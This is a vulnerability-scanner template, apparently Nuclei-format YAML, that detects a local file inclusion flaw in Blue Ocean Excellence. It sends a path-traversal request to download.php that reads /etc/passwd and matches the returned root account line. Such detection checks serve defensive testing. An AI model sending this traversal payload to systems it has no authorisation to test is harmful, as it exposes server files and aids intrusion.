id: blue-ocean-excellence-lfi

info:
  name: Blue Ocean Excellence - Local File Inclusion
  author: pikpikcu
  severity: high
  description: Blue Ocean Excellence is vulnerable to local file inclusion.
  reference:
    - https://blog.csdn.net/qq_41901122/article/details/116786883
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: blue-ocean,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/download.php?file=../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "toor:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 490a0046304402201e0cadac579812ce856b33d3282f8a8af242b1ba1acebd1fdad7aba7b66ca79b02205bbd24eb56e2f630173b84f062f91c4a751ef4c1080f643782d16c7d8736ce54:922c64590222798bb761d5b6d8e72950
